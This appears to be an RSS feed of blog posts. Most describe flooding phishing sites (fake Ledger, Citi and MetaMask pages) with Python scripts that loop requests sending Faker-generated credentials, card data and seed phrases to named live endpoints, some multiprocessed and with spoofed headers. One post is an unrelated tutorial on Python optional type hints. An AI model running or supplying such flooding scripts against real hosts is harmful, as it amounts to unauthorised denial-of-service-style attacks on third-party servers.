        "cvv": fake.credit_card_security_code(),
    }

    step_3_payload = {
        "uid": uid,
        "stp": "3",
        "fullname": fake.name(),
        "bdate": fake.date_of_birth(minimum_age=18).strftime("%m/%d/%Y"),
        "ssn": fake.ssn(),
        "phone": fake.phone_number(),
        "address": fake.street_address(),
        "city": fake.city(),
        "state": fake.state_abbr(),
        "zip": fake.postcode(),
        "email": fake.simple_profile()["mail"],
    }

    step_4_payload = {
        "uid": uid,
        "stp": "4",
        "cemail": fake.simple_profile()["mail"],
        "bdate": fake.password(
            length=12
        ),  # the parameter is bdate but in the frontend it asked for password
    }


requests_sent = 0
while True:
    # dynamically generate fake headers and JSON payloads
    generate_headers_and_payloads()

    # handle exceptions so that the script continues even if there are connection issues
    try:
        # for each step, add in corresponding cookie and random content-length to headers
        base_headers.update(step_0_cookie)
        base_headers.update({"Content-Length": str(fake.random_int(min=80, max=215))})
        response = requests.post(url, headers=base_headers, json=step_0_payload)
        print(f"Step 0 status code: {response.status_code}")

        base_headers.update(step_1_cookie)
        base_headers.update({"Content-Length": str(fake.random_int(min=80, max=215))})
        response = requests.post(url, headers=base_headers, json=step_1_payload)
        print(f"Step 1 status code: {response.status_code}")

        base_headers.update(step_2_cookie)
        base_headers.update({"Content-Length": str(fake.random_int(min=80, max=215))})
        response = requests.post(url, headers=base_headers, json=step_2_payload)
        print(f"Step 2 status code: {response.status_code}")

        base_headers.update(step_3_cookie)
        base_headers.update({"Content-Length": str(fake.random_int(min=80, max=215))})
        response = requests.post(url, headers=base_headers, json=step_3_payload)
        print(f"Step 3 status code: {response.status_code}")

        base_headers.update(step_4_cookie)
        base_headers.update({"Content-Length": str(fake.random_int(min=80, max=215))})
        response = requests.post(url, headers=base_headers, json=step_4_payload)
        print(f"Step 4 status code: {response.status_code}")

        requests_sent = requests_sent + 5
        print(f"Requests sent: {requests_sent}")
    except requests.exceptions.RequestException as e:
        print({e})

It’s quite lengthy but it works. I ran the script in the background and went about my day.

Terminal output after running the Python script

More Retaliation Against Scammers

If you enjoyed this, I’ve done a few other posts similar to this one:

Elsewhere

Also posted on: dev.to

]]> Optional Type Hints in Python https://nelson.cloud/optional-type-hints-in-python/?ref=rss Tue, 16 Jan 2024 00:00:00 +0000 https://nelson.cloud/optional-type-hints-in-python/?ref=rss Comparing Optional[str] vs str | None syntax in Python v3.10+ with practical examples.Python lets you write optional type hints where you can return either a specified type or None. This is a guide with some examples demonstrating different use cases.

Note:

Despite type hints, a function will still let you return whatever type you want. Type hints are more useful when using linting tools or an IDE to ensure that functions return the correct value(s).

All examples on this post have been tested with Python 3.12.1

For reference, here is what it looks like when a non-optional type hint for a string is specified in a Python function’s argument and return value:

1
2

def example(string: str) -> str:
    return "Hello!"

Two Ways of Specifying Optional Type Hints

There are two ways to specify optional type hints.

You can import Optional from the typing module and then specify type hints as follows:

1
2
3
4

from typing import Optional

def example(value: Optional[str]) -> Optional[str]:
    return value

As of Python 3.10, you can also use a shorthand notation, replacing Optional[str] with str | None. There is no import required:

1
2

def example(value: str | None) -> str | None:
    return value

Both examples above are equivalent to each other. Both functions also accept None as a return type.

Examples

Here are some useful examples showing optional type hints using the typing module and the shorthand notation.

One Optional Type Hint

A single optional type hint for an integer as an argument and as a return value looks like this:

1
2
3
4

from typing import Optional

def example(num: Optional[int] = 0) -> Optional[int]:
    return num

And this is what the shorthand notation looks like:

1
2

def example(num: int | None = 0) -> int | None:
    return num

In the examples above, the num variable has to be an integer or None, and it has a default value of 0. The return type has to be an integer or None.

Two or More Optional Type Hints

To specify two or more optional type hints, we need to import Union from the typing module.

In this example, the type hints indicate that either an integer, a string, or None can be assigned to the data input variable. The data variable has a default value of None.

The type hints also indicate that an integer, a string, or None can be returned.

Linters like mypy prefer an explicit None return value when None is a valid return type. That’s why the examples have return None instead of just return at the end of the function.

1
2
3
4

from typing import Union

def example(data: Union[int, str, None] = None) -> Union[int, str, None]:
    return None

And this is what the shorthand notation would look like in Python 3.10+:

1
2

def example(data: int | str | None = None) -> int | str | None:
    return None

Note:

When using Union, it does not include the None type by default. Unlike Optional, which includes None by default.

If you want None to be included in Union you need to be explicit:

1

Union[int, None]

With Optional, you don’t need to be explicit:

1

Optional[int]

Mandatory Presence of Two or More Optional Type Hints

If you’d like to create a type hint that specifies a function must return 2 or more types (as opposed to at least one of the specified types), you need to use tuples. In this case we import Tuple instead of Union and use it in the type hint:

1
2
3
4

from typing import Tuple

def example(num: int = 0, string: str = "Hello!") -> Tuple[int, str]:
    return num, string

Tuples can also be used as type hints for function arguments. In the example below, the type of values must be a tuple consisting of an integer and a string. The default value is a tuple with 0 and an empty string "".

1
2
3
4

from typing import Tuple

def example(values: Tuple[int, str] = (0, "")) -> Tuple[int, str]:
    return values

As of Python 3.9, there is a shorthand for tuple type hints. You can use tuple instead of importing Tuple from the typing module:

1
2

def example(values: tuple[int, str] = (0, "")) -> tuple[int, str]:
    return values

References

I am no expert in Python, so please refer to the official documentation for more information:

]]> Hitting Back at Ledger Scammers With Python https://nelson.cloud/hitting-back-at-ledger-scammers-with-python/?ref=rss Wed, 27 Dec 2023 00:00:00 +0000 https://nelson.cloud/hitting-back-at-ledger-scammers-with-python/?ref=rss Using a Python script to send fake data to a Ledger phishing site.Fake Ledger Email

I recently received this email claiming to be from Ledger. I immediately knew it was a scam.

Email pretending to be from Ledger

I decided to take a peek at vaultscanner.com just for fun. The site looked like a genuine Ledger site. This site was created with more effort than other scam sites I’ve seen.

The fake Ledger website.

I clicked on a random Ledger device and it played a “connecting” animation.

Fake Ledger site showing a Ledger device connecting.

After that I got an error. It’s obviously fake. How can my Ledger data be damaged if I didn’t connect a Ledger device to begin with? I don’t even own one.

Fake error

And of course, the site then prompts for the recovery phrase.

Fake Ledger site asking for recovery phrase

I checked the browser dev tools to see where this phrase was going to. It was getting sent as a query string to /data1.php as a POST request.

Developer tools showing where the recovery phrase was sent

Writing a Python Script

I had an idea to write a quick Python script to send fake data to the scammers. This is something I’ve done in the past to MetaMask scammers: Retaliating Against MetaMask Scammers With Python.

With some quick research, I found that the recovery phrases for Ledger devices are created using the same wordlist that MetaMask uses. I also learned that Ledger recovery phrases are 24 words long. With this information I was ready to start writing a script.

Here’s the script I came up with:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

import requests
import random
import time

# List of words from https://github.com/bitcoin/bips/blob/master/bip-0039/english.txt
# (Trimmed due to long length)
WORDLIST = [
    "abandon",
    "ability",
    "able",
    "about",
    "above",
    .
    .
    .
]

requests_sent = 0

while True:
    # getting list of 24 random words
    recovery_phrase = random.sample(WORDLIST, 24)

    # joining the list of 24 words into a single string
    recovery_phrase = " ".join(recovery_phrase)

    # query string for request
    params = {
        "privateKey": recovery_phrase,
        "token": "Ledger"
    }

    # sending POST request
    response = requests.post(
        "https://vaultscanner.com/data1.php", params=params, headers={}
    )

    requests_sent = requests_sent + 1

    # Output
    print(f"Requests sent: {requests_sent}, Status code: {response.status_code}, Phrase sent: {recovery_phrase}\n")

Then I just let it run for a while to give the scammers a ton of fake data.

Terminal output when running Python script.

I hope I made scamming/phishing more difficult for them :)

]]> Using Python to Flood Scammers with Fake Passwords https://nelson.cloud/using-python-to-flood-scammers-with-fake-passwords/?ref=rss Sat, 02 Jul 2022 00:00:00 +0000 https://nelson.cloud/using-python-to-flood-scammers-with-fake-passwords/?ref=rss Creating a python script to flood scammers with fake credentials.Phishing Attempt via Text Message

Today, I received this text message that is obviously a phishing attempt:

Fake text received from scammers.

I was curious, so I went ahead and checked out the site. It was a mediocre attempt at recreating the actual site.

The fake Citi bank phishing site.

I opened my browser’s dev tools to capture network activity. Then I submitted some made up credentials. Unsurprisingly, they didn’t work:

Failed sign in on the phishing site.

In the dev tools, I checked the headers tab to see that the requests were actually going to https://toys-store.site/citi.php:

Request headers showing where requests were being sent.

I could also see my credentials in the payload:

Request payload showing fake credentials submitted.

With this information, I could create a Python script to flood the scammers with fake credentials. This way, they won’t know what credentials are valid when using them themselves.

Creating a Python Script

My plan was to create a loop that would continuously send POST requests to the scammer site. I wanted to speed up the amount of POST requests I could send at a time. I came across the multiprocessing package that could help me with that. I also planned on using Faker to dynamically generate credentials.

I came up with the following code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

from multiprocessing import Process
from faker import Faker
import requests


fake = Faker()
url = "https://toys-store.site/citi.php"

# use the same request headers shown in the browser dev tools under the 'Network' tab
headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Cache-Control": "no-cache",
    "Connection": "keep-alive",
    "Content-Length": "69",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Host": "toys-store.site",
    "Origin": "https://mobilecitiauthorization.dns2.us",
    "Pragma": "no-cache",
    "Referer": "https://mobilecitiauthorization.dns2.us/",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "cross-site",
    "Sec-GPC": "1",
    "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1",
}

# infinite loop to send requests
def send_post_request():
    while True:

        # dynamically generate request payload using Faker
        payload = {
            "usr": fake.simple_profile()["username"],
            "pwd": fake.password(),
            "login": "",
            "apitoken": "o7y4jat0p65kd4h",
        }

        # send post request with payload and headers
        response = requests.post(url, data=payload, headers=headers)

        # extract time from response headers to make it easier to see when requests are sent in the CLI
        time = response.headers["Date"].split(" ")[4]
        print(f"{time} -- Request sent. Status Code: {response.status_code}.")


# starts 25 different processes running this code
if __name__ == "__main__":
    for _ in range(25):
        Process(target=send_post_request).start()

Info:

fake.simple_profile() from the payload dictionary generates a dictionary containing user information. I am only using the username portion in this case.

1

{'username': 'ywarren', 'name': 'Patricia Lyons', 'sex': 'F', 'address': '2910 Smith Islands Suite 134\nRogerschester, SC 47471', 'mail': 'joel67@gmail.com', 'birthdate': datetime.date(1984, 4, 20)}

I ran the script and left it running for a while. The time being printed out is extracted from the response headers. This way I could easily see requests as they’re being sent in the CLI:

CLI output of requests being sent with fake credentials.

It’s not easy to tell in a screenshot, but with the multiprocessing package I was able to speed up the process of sending post requests. My terminal was filling up pretty quickly.

I hope I made the scammers’ lives more difficult as a result of this. I also reported the domains being used so that they are hopefully flagged by browsers in the future.

]]> Retaliating Against MetaMask Scammers With Python https://nelson.cloud/retaliating-against-metamask-scammers-with-python/?ref=rss Thu, 28 Apr 2022 00:00:00 +0000 https://nelson.cloud/retaliating-against-metamask-scammers-with-python/?ref=rss Using Python to send fake seed phrases to a MetaMask scam site.Reconnaissance

Recently, I received this email:

fake metamask email

I have never used MetaMask. It was pretty obvious this was a scam. I decided to check it out anyway out of curiosity. It led me to this site which looked legit but had a major flaw: there is no domain and I’m accessing an insecure IP address.

fake metamask site

Still curious, I followed along and clicked on “Start verification process”. In the next page, there was a text field prompting me to input my seed phrase:

fake metamask input field for seed phrases

So I submitted 12 random words and used the browser dev tools to figure out where my seed phrase was being sent to.

fake metamask post-submission page

It looks like my fake seed phrase is being sent to /log.php as a query string through a GET request. I wanted to make these scammers pay somehow. I figured I could come up with a quick script to slam this endpoint with random seed phrases to waste their time.

To make my made up seed phrases look more legitimate, I needed to find out if the words in seed phrases have certain limits or if they come from a pool of words. I want the scammers to try every single phrase I submit only to find out that they don’t work.

After doing some reading from the official MetaMask site, I saw this:

metamask documentation

So there’s a specific list of words that seed phrases are generated from and I have a direct link to them. This was perfect. I could use this list of words in my script:

Scripting Time

I came up with a Python script that takes the list of words from the GitHub link, generates a 12 word seed phrase, and sends a GET request to the scammer URL along with the seed phrase as a query string:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

import requests
import random

# List of words from https://github.com/bitcoin/bips/blob/master/bip-0039/english.txt
# (Trimmed due to long length)
SEED_PHRASE_WORDS = [
    "abandon",
    "ability",
    "able",
    "about",
    "above",
    .
    .
    .
]

# getting list of 12 random words
seed_phrase = random.sample(SEED_PHRASE_WORDS, 12)

# joining the list of 12 words into a single string
seed_phrase = " ".join(seed_phrase)

# query string for request
params = {"send_words": seed_phrase}

# sending GET request
response = requests.get("http://176.113.115.238/38sy2a0egs6zhxv/log.php", params=params)

# Output
print(f'Sent phrase: {seed_phrase}')
print(f'{response.status_code} {response.text}')

I ran this and it worked:

script output

The final step was to put this on a loop and leave it running for a very long time. I added a while loop. This is what the updated code looks like:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

import requests
import random

# List of words from https://github.com/bitcoin/bips/blob/master/bip-0039/english.txt
# (Trimmed due to long length)
SEED_PHRASE_WORDS = [
    "abandon",
    "ability",
    "able",
    "about",
    "above",
    .
    .
    .
]

while True:
    # getting list of 12 random words
    seed_phrase = random.sample(SEED_PHRASE_WORDS, 12)

    # joining the list of 12 words into a single string
    seed_phrase = " ".join(seed_phrase)

    # query string for request
    params = {"send_words": seed_phrase}

    # sending GET request
    response = requests.get("http://176.113.115.238/38sy2a0egs6zhxv/log.php", params=params)

    # Output
    print(f'Sent phrase: {seed_phrase}')
    print(f'{response.status_code} {response.text}')

After that, I left my script running overnight:

script output with loop

The morning after, I noticed that my script output was stuck along with a new response message…

scammer response

I guess they caught on LOL. They blocked my IP address from sending requests, so I simply changed my IP address and carried on.

2022-07-25 Update:

I should have included headers in my requests to make them look as legitimate as possible. The requests Python package sends the version of the package itself in the User-Agent header, giving away the fact that Python is being used to send requests.

The following code shows an example of the User-Agent being sent:

1
2
3
4
5
6
7

import requests

r = requests.get('https://google.com')

print(r.request.headers)

# => {'User-Agent': 'python-requests/2.27.1', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

Using Little Snitch I was able to see that this IP address originates from Russia, which I thought was interesting.

Little Snitch connection to Russia

Final Thoughts

I hate scammers. I hope I made their lives difficult. If they’re smart, they’ll filter out seed phrases coming in from my IP address in their database. But considering that their fake MetaMask site doesn’t use a domain or SSL, they probably aren’t very bright. Even if my original IP address was blocked, I’m sure the seed phrases I provided polluted their database. I doubt they’re keeping track of IP addresses at the database level.

]]>